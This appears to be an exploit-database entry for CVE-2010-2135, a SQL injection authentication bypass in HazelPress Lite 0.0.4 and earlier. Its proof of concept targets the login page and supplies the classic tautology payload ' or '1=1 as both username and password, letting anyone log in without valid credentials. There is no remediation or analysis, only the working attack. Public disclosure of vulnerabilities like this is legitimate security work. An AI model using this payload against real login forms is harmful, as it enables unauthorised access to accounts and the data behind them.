HazelPress Lite <= 0.0.4 (Auth Bypass) SQL Injection Vulnerability



EDB-ID: 11602 CVE: 2010-2135 OSVDB-ID: 65129
Author: cr4wl3r Published: 2010-02-28 Verified: Verified
Exploit Code:   Download Vulnerable App:    Download

Rating

(0.0)
Prev Home Next
# HazelPress Lite <= 0.0.4 (Auth Bypass) SQL Injection Vulnerability
# By cr4wl3r
# Download: http://hazelpress.org/index.php?hazel=downloads

# PoC: [path]/login.php

# Username: ' or '1=1
# password: ' or '1=1